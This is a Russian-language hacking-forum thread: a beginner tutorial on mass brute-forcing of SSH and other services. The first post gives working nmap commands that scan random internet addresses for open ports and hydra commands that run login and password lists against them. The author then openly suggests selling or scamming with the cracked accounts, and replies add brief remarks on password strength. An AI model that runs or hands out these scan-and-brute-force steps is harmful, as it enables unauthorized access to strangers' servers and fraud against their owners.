Инструкция по брутфорсу для чайников (nmap+hydra)

Тема в разделе "Взлом и уязвимости", создана пользователем evaporator, 19 фев 2017.

  1. evaporator

    evaporator

    Сообщения:
    208
    Баллы:
    16
    Доброго здоровьичка и крепких нервов, форумчане. Тема сегодняшнего урока - брутфорс с помощью замечательной hydra, цели для которой получим nmap'ом.

    Ликбез: nmap - сканер сетей, с его помощью мы будем сканировать нужный сервер на предмет открытого порта. hydra - брутфорсер.

    Итак, берём Debian-дистрибутив. Он может быть установленной первой/второй/единственной системой, может быть установлен виртуалкой, но лучше всего - использовать vds/vps. Естественно, нам нужен терминал.
    Я обычно терминалом пользуюсь из-под рута, чего вам не советую, но для исключения в дальнейшем тупых вопросов в духе "пишет, что у меня недостаточно прав. что делать? помогите", первая команда будет:
    Код:
    sudo -i
    или
    Код:
    su
    Вводим рут-пароль (да, никаких звёздочек, крестиков или черточек не должно вводиться при вводе пароля, вводится вслепую). Готово, вы - суперпользователь.

    Первым делом обновляем списки пакетов и устанавливаем необходимое:
    Код:
    apt-get update
    apt-get install -y nmap hydra
    Я сканировал случайные ip на предмет открытого 22-го порта. если вам нужен другой порт, поставьте свой в команде ниже.
    Заводим nmap:
    Код:
    nmap -v -Pn -iR [количество случайных ip] -p [номер порта] --open | grep ([0-9]{1,3}[\.]){3}[0-9]{1,3} > /home/iplist
    Если же у вас есть свой список адресов, вместо -iR [количество случайных ip], вводите -iL [пусть к файлу]. Здесь еще присутствует grep - он парсит из "грящного" вывода nmap'а ipv4-адреса и аккуратно записывает их в файл iplist, который находится по пути /home/.
    После завершения сканирования, проверим, что у нас получилось:
    Код:
    nano /home/iplist
    Там должен быть список адресов, разделённых символом переноса строки (просто каждый айпи с новой строки). Убедившись, что всё хорошо, закрываем nano сочетанием клавиш ctrl+c.

    Не хватает всего-то списко логинов и списка паролей. Создаём файл с логинами:
    Код:
    nano /home/loginlist
    В редактор пишем, вставляем из буфера обмена логины, жмём ctrl+x, соглашаемся с сохранением.
    Тот же фокус проделываем и со списком паролей, только пишем/вставляем из буфера обмена уже не логины, а пароли и файл называем не loginlist, а, скажем, passlist.

    Пуск!
    Код:
    hydra -L /home/loginlist -P passlist -M iplist -t [кол-во задач(потоков), 16 по умолчанию] -o [путь к файлу для вывода] [назвние сервиса]
    Спойлер: Вот, кстати, по каким протоколам она работает:
    asterisk
    cisco
    cisco-enable
    cvs
    firebird
    ftp
    ftps
    http-{head|get}
    http-{get|post}-form
    http-proxy
    http-proxy-urlenum
    icq
    imap
    irc
    ldap2
    ldap3[-{cram|digest}md5]
    mssql
    mysql
    nntp
    oracle-listener
    oracle-sid
    pcanywhere
    pcnfs
    pop3
    postgres
    rdp
    rexec
    rlogin
    rsh
    sip
    smb
    smtp
    smtp-enum
    snmp
    socks5
    ssh
    sshkey
    svn
    teamspeak
    telnet
    vmauthd
    vnc
    xmpp
    Всё! Теперь можно идти разводить людей на предоплату, пока выходной файл не наполнится гудами.

    p.s. Я говорил, что пользовался для брута серверами, которые брал бесплатно? Так вот я об этом:
    Скрытый контент. Для просмотра информации необходимо 20 симпатий.
    Нажмите, чтобы раскрыть...
    Или Купить ПРЕМИУМ и получить доступ ко всему контенту сайта​

    Эта часть под хайдом, т.к. могут наебнуть школьники.

    Спасибо за внимание, счастья вам, здоровья и крепких паролей.
  2. SleepyCliff

    SleepyCliff

    Сообщения:
    181
    Баллы:
    16
    Меня вот давно интересует вопрос: возможно ли сгенерировать такой пароль который нереально взломать? Понятно что есть двойна аутентификация и бла-бла-бла. Я так понимаю что это невозможно? Вообще мне всегда было непонятно почему ресурсы позволяют отправлять сотни запросов на один аккаунт с ошибками неверного пароля.. Или как это вообще работает.. Надо будет загуглить, интересно)
  3. evaporator

    evaporator

    Сообщения:
    208
    Баллы:
    16
    Ну, если использовать пароль на пару десятков символов со всевозможными
    извращениями + банить айпи, которые несколько раз получили отказ, то брутить его будут только фетишисты.

Поделиться этой страницей